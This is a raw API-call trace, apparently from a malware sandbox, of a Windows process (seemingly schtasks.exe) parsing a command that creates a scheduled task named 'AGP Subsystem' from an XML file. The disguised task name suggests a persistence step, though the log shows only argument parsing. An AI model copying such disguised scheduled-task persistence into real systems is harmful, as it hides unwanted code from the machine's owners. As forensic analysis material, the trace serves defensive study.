[0169.606] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.606] lstrlenW (lpString="|z|") returned 3
[0169.606] lstrlenW (lpString="|f|") returned 3
[0169.606] StrStrIW (lpFirst="|z|", lpSrch="|f|") returned 0x0
[0169.606] SetLastError (dwErrCode=0x490)
[0169.606] lstrlenW (lpString="f") returned 1
[0169.606] lstrlenW (lpString="f") returned 1
[0169.606] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.607] lstrlenW (lpString="f") returned 1
[0169.607] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.607] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.607] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.607] lstrlenW (lpString="|f|") returned 3
[0169.607] lstrlenW (lpString="|f|") returned 3
[0169.607] StrStrIW (lpFirst="|f|", lpSrch="|f|") returned="|f|"
[0169.607] SetLastError (dwErrCode=0x0)
[0169.607] SetLastError (dwErrCode=0x0)
[0169.607] SetLastError (dwErrCode=0x0)
[0169.607] lstrlenW (lpString="/tn") returned 3
[0169.607] lstrlenW (lpString="-/") returned 2
[0169.607] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0169.607] lstrlenW (lpString="create") returned 6
[0169.607] lstrlenW (lpString="create") returned 6
[0169.607] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.607] lstrlenW (lpString="tn") returned 2
[0169.607] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.607] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x9, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|create|") returned 8
[0169.607] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|tn|") returned 4
[0169.607] lstrlenW (lpString="|create|") returned 8
[0169.607] lstrlenW (lpString="|tn|") returned 4
[0169.607] StrStrIW (lpFirst="|create|", lpSrch="|tn|") returned 0x0
[0169.607] SetLastError (dwErrCode=0x490)
[0169.607] lstrlenW (lpString="?") returned 1
[0169.607] lstrlenW (lpString="?") returned 1
[0169.608] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.608] lstrlenW (lpString="tn") returned 2
[0169.608] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.608] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|?|") returned 3
[0169.608] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|tn|") returned 4
[0169.608] lstrlenW (lpString="|?|") returned 3
[0169.608] lstrlenW (lpString="|tn|") returned 4
[0169.608] SetLastError (dwErrCode=0x490)
[0169.608] lstrlenW (lpString="s") returned 1
[0169.608] lstrlenW (lpString="s") returned 1
[0169.608] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.608] lstrlenW (lpString="tn") returned 2
[0169.608] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.608] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|s|") returned 3
[0169.608] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|tn|") returned 4
[0169.608] lstrlenW (lpString="|s|") returned 3
[0169.608] lstrlenW (lpString="|tn|") returned 4
[0169.608] SetLastError (dwErrCode=0x490)
[0169.608] lstrlenW (lpString="u") returned 1
[0169.608] lstrlenW (lpString="u") returned 1
[0169.608] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.608] lstrlenW (lpString="tn") returned 2
[0169.608] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.608] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|u|") returned 3
[0169.609] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|tn|") returned 4
[0169.609] lstrlenW (lpString="|u|") returned 3
[0169.609] lstrlenW (lpString="|tn|") returned 4
[0169.609] SetLastError (dwErrCode=0x490)
[0169.609] lstrlenW (lpString="p") returned 1
[0169.609] lstrlenW (lpString="p") returned 1
[0169.609] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.609] lstrlenW (lpString="tn") returned 2
[0169.609] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.609] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|p|") returned 3
[0169.609] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|tn|") returned 4
[0169.609] lstrlenW (lpString="|p|") returned 3
[0169.609] lstrlenW (lpString="|tn|") returned 4
[0169.609] SetLastError (dwErrCode=0x490)
[0169.609] lstrlenW (lpString="ru") returned 2
[0169.609] lstrlenW (lpString="ru") returned 2
[0169.609] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.609] lstrlenW (lpString="tn") returned 2
[0169.609] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.609] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|ru|") returned 4
[0169.609] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|tn|") returned 4
[0169.609] lstrlenW (lpString="|ru|") returned 4
[0169.609] lstrlenW (lpString="|tn|") returned 4
[0169.609] StrStrIW (lpFirst="|ru|", lpSrch="|tn|") returned 0x0
[0169.609] SetLastError (dwErrCode=0x490)
[0169.609] lstrlenW (lpString="rp") returned 2
[0169.610] lstrlenW (lpString="rp") returned 2
[0169.610] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.610] lstrlenW (lpString="tn") returned 2
[0169.610] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.610] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|rp|") returned 4
[0169.610] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|tn|") returned 4
[0169.610] lstrlenW (lpString="|rp|") returned 4
[0169.610] lstrlenW (lpString="|tn|") returned 4
[0169.610] StrStrIW (lpFirst="|rp|", lpSrch="|tn|") returned 0x0
[0169.610] SetLastError (dwErrCode=0x490)
[0169.610] lstrlenW (lpString="sc") returned 2
[0169.610] lstrlenW (lpString="sc") returned 2
[0169.610] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.610] lstrlenW (lpString="tn") returned 2
[0169.614] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.614] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|sc|") returned 4
[0169.614] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|tn|") returned 4
[0169.614] lstrlenW (lpString="|sc|") returned 4
[0169.614] lstrlenW (lpString="|tn|") returned 4
[0169.614] StrStrIW (lpFirst="|sc|", lpSrch="|tn|") returned 0x0
[0169.614] SetLastError (dwErrCode=0x490)
[0169.615] lstrlenW (lpString="mo") returned 2
[0169.615] lstrlenW (lpString="mo") returned 2
[0169.615] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.615] lstrlenW (lpString="tn") returned 2
[0169.615] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.615] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|mo|") returned 4
[0169.615] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|tn|") returned 4
[0169.615] lstrlenW (lpString="|mo|") returned 4
[0169.615] lstrlenW (lpString="|tn|") returned 4
[0169.615] StrStrIW (lpFirst="|mo|", lpSrch="|tn|") returned 0x0
[0169.615] SetLastError (dwErrCode=0x490)
[0169.615] lstrlenW (lpString="d") returned 1
[0169.615] lstrlenW (lpString="d") returned 1
[0169.615] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.615] lstrlenW (lpString="tn") returned 2
[0169.615] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.615] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|d|") returned 3
[0169.615] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|tn|") returned 4
[0169.615] lstrlenW (lpString="|d|") returned 3
[0169.615] lstrlenW (lpString="|tn|") returned 4
[0169.615] SetLastError (dwErrCode=0x490)
[0169.616] lstrlenW (lpString="m") returned 1
[0169.616] lstrlenW (lpString="m") returned 1
[0169.616] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.616] lstrlenW (lpString="tn") returned 2
[0169.616] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.616] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|m|") returned 3
[0169.616] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|tn|") returned 4
[0169.616] lstrlenW (lpString="|m|") returned 3
[0169.616] lstrlenW (lpString="|tn|") returned 4
[0169.616] SetLastError (dwErrCode=0x490)
[0169.616] lstrlenW (lpString="i") returned 1
[0169.616] lstrlenW (lpString="i") returned 1
[0169.616] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.616] lstrlenW (lpString="tn") returned 2
[0169.616] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.616] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|i|") returned 3
[0169.616] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|tn|") returned 4
[0169.616] lstrlenW (lpString="|i|") returned 3
[0169.616] lstrlenW (lpString="|tn|") returned 4
[0169.616] SetLastError (dwErrCode=0x490)
[0169.616] lstrlenW (lpString="tn") returned 2
[0169.616] lstrlenW (lpString="tn") returned 2
[0169.616] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.616] lstrlenW (lpString="tn") returned 2
[0169.616] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.617] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|tn|") returned 4
[0169.617] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|tn|") returned 4
[0169.617] lstrlenW (lpString="|tn|") returned 4
[0169.617] lstrlenW (lpString="|tn|") returned 4
[0169.617] StrStrIW (lpFirst="|tn|", lpSrch="|tn|") returned="|tn|"
[0169.617] SetLastError (dwErrCode=0x0)
[0169.617] SetLastError (dwErrCode=0x0)
[0169.617] lstrlenW (lpString="AGP Subsystem") returned 13
[0169.617] lstrlenW (lpString="-/") returned 2
[0169.617] StrChrIW (lpStart="-/", wMatch=0x41) returned 0x0
[0169.617] SetLastError (dwErrCode=0x490)
[0169.617] SetLastError (dwErrCode=0x490)
[0169.617] SetLastError (dwErrCode=0x0)
[0169.617] lstrlenW (lpString="AGP Subsystem") returned 13
[0169.617] StrChrIW (lpStart="AGP Subsystem", wMatch=0x3a) returned 0x0
[0169.617] SetLastError (dwErrCode=0x490)
[0169.617] SetLastError (dwErrCode=0x0)
[0169.617] lstrlenW (lpString="AGP Subsystem") returned 13
[0169.617] SetLastError (dwErrCode=0x0)
[0169.617] SetLastError (dwErrCode=0x0)
[0169.617] lstrlenW (lpString="/xml") returned 4
[0169.617] lstrlenW (lpString="-/") returned 2
[0169.617] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0169.617] lstrlenW (lpString="create") returned 6
[0169.617] lstrlenW (lpString="create") returned 6
[0169.617] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.617] lstrlenW (lpString="xml") returned 3
[0169.618] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.618] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x9, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|create|") returned 8
[0169.618] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.618] lstrlenW (lpString="|create|") returned 8
[0169.618] lstrlenW (lpString="|xml|") returned 5
[0169.618] StrStrIW (lpFirst="|create|", lpSrch="|xml|") returned 0x0
[0169.618] SetLastError (dwErrCode=0x490)
[0169.618] lstrlenW (lpString="?") returned 1
[0169.618] lstrlenW (lpString="?") returned 1
[0169.618] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.618] lstrlenW (lpString="xml") returned 3
[0169.618] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.618] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|?|") returned 3
[0169.618] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.618] lstrlenW (lpString="|?|") returned 3
[0169.618] lstrlenW (lpString="|xml|") returned 5
[0169.618] SetLastError (dwErrCode=0x490)
[0169.618] lstrlenW (lpString="s") returned 1
[0169.618] lstrlenW (lpString="s") returned 1
[0169.618] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.618] lstrlenW (lpString="xml") returned 3
[0169.618] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.618] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|s|") returned 3
[0169.618] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.619] lstrlenW (lpString="|s|") returned 3
[0169.619] lstrlenW (lpString="|xml|") returned 5
[0169.619] SetLastError (dwErrCode=0x490)
[0169.619] lstrlenW (lpString="u") returned 1
[0169.619] lstrlenW (lpString="u") returned 1
[0169.619] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.619] lstrlenW (lpString="xml") returned 3
[0169.619] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.619] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|u|") returned 3
[0169.619] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.619] lstrlenW (lpString="|u|") returned 3
[0169.619] lstrlenW (lpString="|xml|") returned 5
[0169.619] SetLastError (dwErrCode=0x490)
[0169.619] lstrlenW (lpString="p") returned 1
[0169.619] lstrlenW (lpString="p") returned 1
[0169.619] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.619] lstrlenW (lpString="xml") returned 3
[0169.619] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.619] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|p|") returned 3
[0169.619] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.619] lstrlenW (lpString="|p|") returned 3
[0169.619] lstrlenW (lpString="|xml|") returned 5
[0169.619] SetLastError (dwErrCode=0x490)
[0169.619] lstrlenW (lpString="ru") returned 2
[0169.620] lstrlenW (lpString="ru") returned 2
[0169.620] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.620] lstrlenW (lpString="xml") returned 3
[0169.620] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.620] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|ru|") returned 4
[0169.620] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.620] lstrlenW (lpString="|ru|") returned 4
[0169.620] lstrlenW (lpString="|xml|") returned 5
[0169.620] SetLastError (dwErrCode=0x490)
[0169.620] lstrlenW (lpString="rp") returned 2
[0169.620] lstrlenW (lpString="rp") returned 2
[0169.620] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.620] lstrlenW (lpString="xml") returned 3
[0169.620] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.620] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|rp|") returned 4
[0169.620] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.620] lstrlenW (lpString="|rp|") returned 4
[0169.620] lstrlenW (lpString="|xml|") returned 5
[0169.620] SetLastError (dwErrCode=0x490)
[0169.620] lstrlenW (lpString="sc") returned 2
[0169.620] lstrlenW (lpString="sc") returned 2
[0169.620] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.620] lstrlenW (lpString="xml") returned 3
[0169.620] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.621] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|sc|") returned 4
[0169.621] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.621] lstrlenW (lpString="|sc|") returned 4
[0169.621] lstrlenW (lpString="|xml|") returned 5
[0169.621] SetLastError (dwErrCode=0x490)
[0169.621] lstrlenW (lpString="mo") returned 2
[0169.621] lstrlenW (lpString="mo") returned 2
[0169.621] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.621] lstrlenW (lpString="xml") returned 3
[0169.621] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.621] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|mo|") returned 4
[0169.621] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.621] lstrlenW (lpString="|mo|") returned 4
[0169.621] lstrlenW (lpString="|xml|") returned 5
[0169.621] SetLastError (dwErrCode=0x490)
[0169.621] lstrlenW (lpString="d") returned 1
[0169.621] lstrlenW (lpString="d") returned 1
[0169.621] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.621] lstrlenW (lpString="xml") returned 3
[0169.621] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.621] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|d|") returned 3
[0169.621] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.621] lstrlenW (lpString="|d|") returned 3
[0169.622] lstrlenW (lpString="|xml|") returned 5
[0169.622] SetLastError (dwErrCode=0x490)
[0169.622] lstrlenW (lpString="m") returned 1
[0169.622] lstrlenW (lpString="m") returned 1
[0169.622] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.622] lstrlenW (lpString="xml") returned 3
[0169.622] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.622] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|m|") returned 3
[0169.622] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.622] lstrlenW (lpString="|m|") returned 3
[0169.622] lstrlenW (lpString="|xml|") returned 5
[0169.622] SetLastError (dwErrCode=0x490)
[0169.622] lstrlenW (lpString="i") returned 1
[0169.622] lstrlenW (lpString="i") returned 1
[0169.622] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.622] lstrlenW (lpString="xml") returned 3
[0169.622] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.622] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|i|") returned 3
[0169.622] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.622] lstrlenW (lpString="|i|") returned 3
[0169.622] lstrlenW (lpString="|xml|") returned 5
[0169.622] SetLastError (dwErrCode=0x490)
[0169.622] lstrlenW (lpString="tn") returned 2
[0169.622] lstrlenW (lpString="tn") returned 2
[0169.622] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.623] lstrlenW (lpString="xml") returned 3
[0169.623] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.623] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|tn|") returned 4
[0169.623] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.623] lstrlenW (lpString="|tn|") returned 4
[0169.623] lstrlenW (lpString="|xml|") returned 5
[0169.623] SetLastError (dwErrCode=0x490)
[0169.623] lstrlenW (lpString="tr") returned 2
[0169.623] lstrlenW (lpString="tr") returned 2
[0169.623] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.623] lstrlenW (lpString="xml") returned 3
[0169.623] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.623] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|tr|") returned 4
[0169.623] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.623] lstrlenW (lpString="|tr|") returned 4
[0169.623] lstrlenW (lpString="|xml|") returned 5
[0169.623] SetLastError (dwErrCode=0x490)
[0169.623] lstrlenW (lpString="st") returned 2
[0169.623] lstrlenW (lpString="st") returned 2
[0169.623] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.623] lstrlenW (lpString="xml") returned 3
[0169.623] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.623] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|st|") returned 4
[0169.623] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.624] lstrlenW (lpString="|st|") returned 4
[0169.624] lstrlenW (lpString="|xml|") returned 5
[0169.624] SetLastError (dwErrCode=0x490)
[0169.624] lstrlenW (lpString="sd") returned 2
[0169.624] lstrlenW (lpString="sd") returned 2
[0169.624] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.624] lstrlenW (lpString="xml") returned 3
[0169.624] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.624] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|sd|") returned 4
[0169.624] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.624] lstrlenW (lpString="|sd|") returned 4
[0169.624] lstrlenW (lpString="|xml|") returned 5
[0169.624] SetLastError (dwErrCode=0x490)
[0169.624] lstrlenW (lpString="ed") returned 2
[0169.624] lstrlenW (lpString="ed") returned 2
[0169.624] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.624] lstrlenW (lpString="xml") returned 3
[0169.624] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.624] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|ed|") returned 4
[0169.624] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.624] lstrlenW (lpString="|ed|") returned 4
[0169.624] lstrlenW (lpString="|xml|") returned 5
[0169.624] SetLastError (dwErrCode=0x490)
[0169.624] lstrlenW (lpString="it") returned 2
[0169.624] lstrlenW (lpString="it") returned 2
[0169.625] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.625] lstrlenW (lpString="xml") returned 3
[0169.625] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.625] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|it|") returned 4
[0169.625] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.625] lstrlenW (lpString="|it|") returned 4
[0169.625] lstrlenW (lpString="|xml|") returned 5
[0169.625] SetLastError (dwErrCode=0x490)
[0169.625] lstrlenW (lpString="et") returned 2
[0169.625] lstrlenW (lpString="et") returned 2
[0169.625] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.625] lstrlenW (lpString="xml") returned 3
[0169.625] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.625] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|et|") returned 4
[0169.625] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.625] lstrlenW (lpString="|et|") returned 4
[0169.625] lstrlenW (lpString="|xml|") returned 5
[0169.625] SetLastError (dwErrCode=0x490)
[0169.625] lstrlenW (lpString="k") returned 1
[0169.625] lstrlenW (lpString="k") returned 1
